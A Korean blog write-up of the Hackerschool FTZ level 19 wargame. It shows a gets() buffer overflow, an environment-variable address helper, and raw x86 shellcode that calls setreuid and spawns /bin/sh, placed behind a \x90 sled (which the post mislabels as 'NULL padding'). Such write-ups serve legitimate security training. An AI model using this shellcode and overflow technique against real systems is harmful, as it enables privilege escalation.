eli_ez3r
eli_ez3r
eli_ez3r
전체 방문자
오늘
어제
  • 분류 전체보기 (202)
    • 0x01 끄적끄적 :) (57)
      • Network (5)
      • Security (14)
      • Reversing (2)
      • Forensic (5)
      • Operation System (10)
      • Development (10)
      • Solution (7)
      • 보안 상식 (3)
    • 0x02 Study :) (127)
      • Pwnable (59)
      • Webhacking (56)
      • Reversing (11)
      • Machine Learning (1)
    • 0x03 ETC :) (16)
      • IT Unpacking (5)
      • IT Information (1)
      • Enjoy (4)
      • Etc (6)
    • Admin :) (0)
      • 0x01 (0)

블로그 메뉴

  • 홈
  • 태그
  • 방명록

공지사항

  • github.io 블로그 개설

인기 글

태그

  • buffer
  • hacking
  • hacker
  • 문제풀이
  • hakcing
  • 설명
  • web
  • 해킹
  • 스쿨
  • school
  • 과정
  • 공격
  • 풀이
  • Up
  • hack
  • 암호
  • attack
  • 오버플로우
  • 해커
  • pwnable
  • BOF
  • 패스워드
  • LOB
  • LEVEL
  • password
  • webhacking.kr
  • 문제
  • overflow
  • write
  • 메모리

최근 댓글

최근 글

티스토리

hELLO · Designed By 정상우.
eli_ez3r

eli_ez3r

[해커스쿨] FTZ level19 풀이과정
0x02 Study :)/Pwnable

[해커스쿨] FTZ level19 풀이과정

2017. 1. 12. 10:27

2017/01/12 - [Study :)/FTZ] - [해커스쿨] FTZ level18 풀이과정


main()
{ char buf[20];
  gets(buf);
  printf("%s\n",buf);
} 

힌트를 보면,

buf사이즈는 20Byte이다. 

buf에 쉘코드를 넣기에는 작은 사이즈이므로, 환경변수에 쉘코드를 넣고 시작하자.

//getenv.c
main(){
        printf("[%08p]\n", getenv("SHELL") );
} 
ShellCode(41Byte)
\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80

환경변수에 "\x90"(NULL패딩)을 100Byte넣어주고 쉘코드를 넣어주었다.



hint를 보면 표준입력으로 입력받으므로 level12(http://eunice513.tistory.com/57)를 참고하여 입력을 넘기면 될 듯하다.



저작자표시 비영리 변경금지 (새창열림)
    '0x02 Study :)/Pwnable' 카테고리의 다른 글
    • [LOB] 원정대란?
    • [해커스쿨] FTZ level20 풀이 과정 (Final)
    • [해커스쿨] FTZ level18 풀이과정
    • [해커스쿨] FTZ level17 풀이과정
    eli_ez3r
    eli_ez3r

    티스토리툴바